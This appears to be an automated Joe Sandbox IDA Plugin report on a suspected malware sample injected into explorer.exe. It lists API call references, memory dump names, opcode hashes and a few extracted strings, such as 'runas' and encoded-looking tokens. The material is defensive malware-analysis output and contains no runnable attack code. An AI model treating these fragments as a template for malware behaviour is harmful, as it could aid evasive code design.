• Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
Similarity
• API ID:
• String ID: list too long
• API String ID: 0-1124181908
APIs
• _ValidateLocalCookies.LIBCMT ref: 0322C827
• ___except_validate_context_record.LIBVCRUNTIME ref: 0322C82F
• _ValidateLocalCookies.LIBCMT ref: 0322C8B8
• __IsNonwritableInCurrentImage.LIBCMT ref: 0322C8E3
• _ValidateLocalCookies.LIBCMT ref: 0322C938
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
• Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
• Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
Similarity
• API ID:
• String ID: api-ms-$ext-ms-
• API String ID: 0-537541572
APIs
  • Part of subcall function 03241132: _free.LIBCMT ref: 03241157
• _free.LIBCMT ref: 03241434
  • Part of subcall function 032381B6: HeapFree.KERNEL32(00000000,00000000,?,0324115C,?,00000000,?,8B18EC83,?,032413FF,?,00000007,?,?,032418A4,?), ref: 032381CC
  • Part of subcall function 032381B6: GetLastError.KERNEL32(?,?,0324115C,?,00000000,?,8B18EC83,?,032413FF,?,00000007,?,?,032418A4,?,?), ref: 032381DE
• _free.LIBCMT ref: 0324143F
• _free.LIBCMT ref: 0324144A
• _free.LIBCMT ref: 0324149E
• _free.LIBCMT ref: 032414A9
• _free.LIBCMT ref: 032414B4
• _free.LIBCMT ref: 032414BF
Memory Dump Source
• Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
• Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
• GetConsoleOutputCP.KERNEL32(?,00000000,?), ref: 032377B7
• __fassign.LIBCMT ref: 0323799C
• __fassign.LIBCMT ref: 032379B9
• WriteFile.KERNEL32(?,8B18EC83,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 03237A01
• WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 03237A41
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 03237AE9
Memory Dump Source
• Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
• Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
Similarity
• API ID: FileWrite__fassign$ConsoleErrorLastOutput
• String ID:
• API String ID: 1735259414-0
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0322981F
• MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0322988A
• LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 032298A7
• LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 032298E6
• LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 03229945
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 03229968
Memory Dump Source
• Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
• Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
Similarity
• API ID: ByteCharMultiStringWide
• String ID:
• API String ID: 2829165498-0
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 032247B5
• std::_Lockit::_Lockit.LIBCPMT ref: 032247D7
• std::_Lockit::~_Lockit.LIBCPMT ref: 032247F7
• __Getctype.LIBCPMT ref: 0322488D
• std::_Facet_Register.LIBCPMT ref: 032248AC
• std::_Lockit::~_Lockit.LIBCPMT ref: 032248C4
Memory Dump Source
• Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
• Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
• String ID:
• API String ID: 1102183713-0
APIs
• Sleep.KERNEL32(00000064,74D40A26,?,00000000,032490FD,000000FF), ref: 03208A1C
• __Init_thread_footer.LIBCMT ref: 03208AB6
  • Part of subcall function 03229A98: EnterCriticalSection.KERNEL32(03268FA8,774D0F00,?,03208ABB,0326CDC0,03250100), ref: 03229AA2
  • Part of subcall function 03229A98: LeaveCriticalSection.KERNEL32(03268FA8,?,03208ABB,0326CDC0,03250100), ref: 03229AD5
  • Part of subcall function 03229A98: WakeAllConditionVariable.KERNEL32(?,0326CDC0,03250100), ref: 03229B4C
• CreateThread.KERNEL32(00000000,00000000,03208880,0326C578,00000000,00000000), ref: 03208B1B
• Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?), ref: 03208B26
  • Part of subcall function 03229AE2: EnterCriticalSection.KERNEL32(03268FA8,00000000,774D0F00,?,03208A41,0326CDC0), ref: 03229AED
  • Part of subcall function 03229AE2: LeaveCriticalSection.KERNEL32(03268FA8,?,03208A41,0326CDC0), ref: 03229B2A
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
• Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
Similarity
• API ID: CriticalSection$EnterLeaveSleep$ConditionCreateInit_thread_footerThreadVariableWake
• String ID: runas
• API String ID: 4065365256-4000483414
APIs
• GetLastError.KERNEL32(?,0324BDDD,0322C9AB,0322B044,03227D59,74D40A26,?,?,?,00000000,0324C997,000000FF,?,03202576,?,?), ref: 0322C9C2
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0322C9D0
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0322C9E9
• SetLastError.KERNEL32(00000000,?,00000000,0324C997,000000FF,?,03202576,?,?,0000000F,03203BA5,00000000,0000000F,00000000,0324C330,000000FF), ref: 0322CA3B
Memory Dump Source
• Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
• Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
APIs
  • Part of subcall function 0320ACA0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,74D40A26,00000000,00000000), ref: 0320ACED
  • Part of subcall function 0320A940: GetModuleFileNameA.KERNEL32(00000000,?,00000104,74D40A26,00000000,00000000), ref: 0320A98D
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 03215324
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
• Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
Similarity
• API ID: FileModuleName
• String ID: #$246122658369$8a680c$ZJF=
• API String ID: 514040917-381243889
Strings
• C:\Windows\SysWOW64\explorer.exe, xrefs: 0323F64C
Memory Dump Source
• Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
• Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
Similarity
• API ID:
• String ID: C:\Windows\SysWOW64\explorer.exe
• API String ID: 0-2751450654
                                                  • Opcode ID: ab87b140315887bf99874f8dd9ed8318fb404bfef41c5da68d6f429a18791ec8
                                                  • Instruction ID: a011361470f50950f9e8adc2221be3b2efa8ef180ff736eb74f1f672c2c3dd45
                                                  • Opcode Fuzzy Hash: ab87b140315887bf99874f8dd9ed8318fb404bfef41c5da68d6f429a18791ec8
                                                  • Instruction Fuzzy Hash: 1721F5F5A24306BFDB10EE71AD80D2B736DEF02268B044514F924DA650D7B0EC908BA0
                                                  APIs
                                                  • FreeLibrary.KERNEL32(00000000,?,?,0322DAC8,?,?,00000000,?,?,0322DB7A,00000002,FlsGetValue,032533D8,032533E0,?), ref: 0322DA97
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID: api-ms-
                                                  • API String ID: 3664257935-2084034818
                                                  • Opcode ID: 998e87cf00d1799bd777b3efce44d585ea987ac08e28aa20cff8de91a04dd63c
                                                  • Instruction ID: 12d1e34341ec60ae3aaa9e000d3518c6716d18a8a785f8d6cc78130ecdffd18d
                                                  • Opcode Fuzzy Hash: 998e87cf00d1799bd777b3efce44d585ea987ac08e28aa20cff8de91a04dd63c
                                                  • Instruction Fuzzy Hash: F8119435A69332BBDF22DA6C9C44F9D7B98AF01770F1A4250ED25E7184D670EA8086D0
                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0322DE97,?,?,0322DE5F,00000000,00000000,?), ref: 0322DEB7
                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0322DECA
                                                  • FreeLibrary.KERNEL32(00000000,?,?,0322DE97,?,?,0322DE5F,00000000,00000000,?), ref: 0322DEED
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 89256286e0ad68dbf99237a3fb87173bf195a68d4b0af08e59dd493de4b5ea3b
                                                  • Instruction ID: 3fe2e94cb62856325179cd8a4ab54205db80d09a908a7d1d7114e8aa349f6e6a
                                                  • Opcode Fuzzy Hash: 89256286e0ad68dbf99237a3fb87173bf195a68d4b0af08e59dd493de4b5ea3b
                                                  • Instruction Fuzzy Hash: 63F08231610229FBDF11EB50ED0DB9EBE68EF00756F144090F800E1450CB749F50DA90
                                                  APIs
                                                    • Part of subcall function 03236DD0: GetLastError.KERNEL32(00000000,00000000,?,03237BB7,?,00000000,00000000,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010), ref: 03236DD5
                                                    • Part of subcall function 03236DD0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010,03231112,00000000,00000000,00000000), ref: 03236E73
                                                  • _free.LIBCMT ref: 03235C5B
                                                  • _free.LIBCMT ref: 03235C74
                                                  • _free.LIBCMT ref: 03235CB2
                                                  • _free.LIBCMT ref: 03235CBB
                                                  • _free.LIBCMT ref: 03235CC7
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorLast
                                                  • String ID:
                                                  • API String ID: 3291180501-0
                                                  • Opcode ID: 919d8559a8d10c9d5969a3fe6367357e85f183878e213f8f233501b13a73b820
                                                  • Instruction ID: 369560ddd98da0cbaa5ef7039e0a85eb722490c1b939ed0f885cfeb946618515
                                                  • Opcode Fuzzy Hash: 919d8559a8d10c9d5969a3fe6367357e85f183878e213f8f233501b13a73b820
                                                  • Instruction Fuzzy Hash: C8B13AB592121A9FDB24DF18C884AADB7B5FF4A304F2445EAD849A7350D770AED4CF80
                                                  APIs
                                                    • Part of subcall function 032383E5: HeapAlloc.KERNEL32(00000000,03220D37,?,?,03229DCF,03220D37,?,032233CE,8B18EC84,774D0F00), ref: 03238417
                                                  • _free.LIBCMT ref: 032355F4
                                                  • _free.LIBCMT ref: 0323560B
                                                  • _free.LIBCMT ref: 03235628
                                                  • _free.LIBCMT ref: 03235643
                                                  • _free.LIBCMT ref: 0323565A
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: _free$AllocHeap
                                                  • String ID:
                                                  • API String ID: 1835388192-0
                                                  • Opcode ID: e1be256c3d9d3cd9649095c50d209188b905c85659ac8cf19938863ca454182c
                                                  • Instruction ID: 67f6fd5d8e4884e0172f810174b88d246bd148a990ea26fbd5e6479503ce458c
                                                  • Opcode Fuzzy Hash: e1be256c3d9d3cd9649095c50d209188b905c85659ac8cf19938863ca454182c
                                                  • Instruction Fuzzy Hash: AB51D6B5A20305AFDB21DF69DC40A6AB7F5EF4A720F240559E849DB250E771EA80CB80
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: Mtx_unlock$Cnd_broadcastConcurrency::cancel_current_task
                                                  • String ID:
                                                  • API String ID: 3354401312-0
                                                  • Opcode ID: 42fe8ea0d2c0979b397c1a336e8ed6359de093dd255ffa0e3b97cbe2ef1f5a7a
                                                  • Instruction ID: 352b70fff8d5a2103270f50067375b912b235d0936f1a71de9a1ee98bb70e5e6
                                                  • Opcode Fuzzy Hash: 42fe8ea0d2c0979b397c1a336e8ed6359de093dd255ffa0e3b97cbe2ef1f5a7a
                                                  • Instruction Fuzzy Hash: AE618CB4D1132AEFDF10DFA4C944BAEBBB8BF04304F144199D805AB242D775AA85CBA1
                                                  APIs
                                                  • CoInitialize.OLE32(00000000), ref: 0320F547
                                                  • CoCreateInstance.OLE32(0325DFA8,00000000,00000001,0325E008,?), ref: 0320F563
                                                  • CoUninitialize.OLE32 ref: 0320F571
                                                  • CoUninitialize.OLE32 ref: 0320F630
                                                  • CoUninitialize.OLE32 ref: 0320F644
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: Uninitialize$CreateInitializeInstance
                                                  • String ID:
                                                  • API String ID: 1968832861-0
                                                  • Opcode ID: d96cc1a695f79e8658f843ba6bcfd9968a8618b9e9a1c9f198f3fa2b7f74f9ca
                                                  • Instruction ID: 95cb6bff87aa45465d6d6c883fb1fc5cf245c8edf45e567c749471bca9a9bf9e
                                                  • Opcode Fuzzy Hash: d96cc1a695f79e8658f843ba6bcfd9968a8618b9e9a1c9f198f3fa2b7f74f9ca
                                                  • Instruction Fuzzy Hash: DE51D971A20204AFDF14DFA4DD44BDEBFB9EF48314F108118E415EB291D774AA84CB90
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 03224F46
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 03224F66
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 03224F86
                                                  • std::_Facet_Register.LIBCPMT ref: 03225021
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 03225039
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                  • String ID:
                                                  • API String ID: 459529453-0
                                                  • Opcode ID: 85d748f2e69340df895e8085bd3a5b515082557077aa5bbfee8caff7a4153c9a
                                                  • Instruction ID: cf804e5d39059fff163f608f0a0f781c6fa63a0ebb1e558e6f90707e37b42e11
                                                  • Opcode Fuzzy Hash: 85d748f2e69340df895e8085bd3a5b515082557077aa5bbfee8caff7a4153c9a
                                                  • Instruction Fuzzy Hash: 7B41BF71910225EFCB24FF95DC40AAEBBB8EF44710F1481ADD8466B281DB70AA81CBD1
                                                  APIs
                                                  • _free.LIBCMT ref: 03240ED3
                                                    • Part of subcall function 032381B6: HeapFree.KERNEL32(00000000,00000000,?,0324115C,?,00000000,?,8B18EC83,?,032413FF,?,00000007,?,?,032418A4,?), ref: 032381CC
                                                    • Part of subcall function 032381B6: GetLastError.KERNEL32(?,?,0324115C,?,00000000,?,8B18EC83,?,032413FF,?,00000007,?,?,032418A4,?,?), ref: 032381DE
                                                  • _free.LIBCMT ref: 03240EE5
                                                  • _free.LIBCMT ref: 03240EF7
                                                  • _free.LIBCMT ref: 03240F09
                                                  • _free.LIBCMT ref: 03240F1B
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 5d479e32fd45438127c9a4795a84defaebf63eae1a2f0aadefe293506dfb3bf4
                                                  • Instruction ID: be65ae05ca5363ebf7b7504f7121de769f8b06ade14c1b8895ba90e4b590b82d
                                                  • Opcode Fuzzy Hash: 5d479e32fd45438127c9a4795a84defaebf63eae1a2f0aadefe293506dfb3bf4
                                                  • Instruction Fuzzy Hash: 7BF06272534301AB8A39EB68F484C1AF7E9EE14710B69C809F549EFB00CF74F8C08A94
                                                  APIs
                                                  • Sleep.KERNEL32(00002710,74D40A26,00000000,?), ref: 03219749
                                                    • Part of subcall function 0320A470: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,74D40A26,00000000,?), ref: 0320A4BA
                                                  • GetFileAttributesA.KERNEL32(?,?,00000000,00000000,03267494,0000000E), ref: 032197C5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: AttributesFileFolderPathSleep
                                                  • String ID: Xq==$Zwyx
                                                  • API String ID: 70540035-1598395721
                                                  • Opcode ID: 19d34d3735cc88418250b202d427fa6939099d74fd87816daec256877ca402fc
                                                  • Instruction ID: b29be759ddbc10e070ab9dfcfa4c3e63a5c1115bb67317ef3065c9b17062e1b4
                                                  • Opcode Fuzzy Hash: 19d34d3735cc88418250b202d427fa6939099d74fd87816daec256877ca402fc
                                                  • Instruction Fuzzy Hash: 07C19F30D14388EFEF14DBA8C958BDDBFB6AF15304F248198D4446B282C7B55AC8DBA1
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
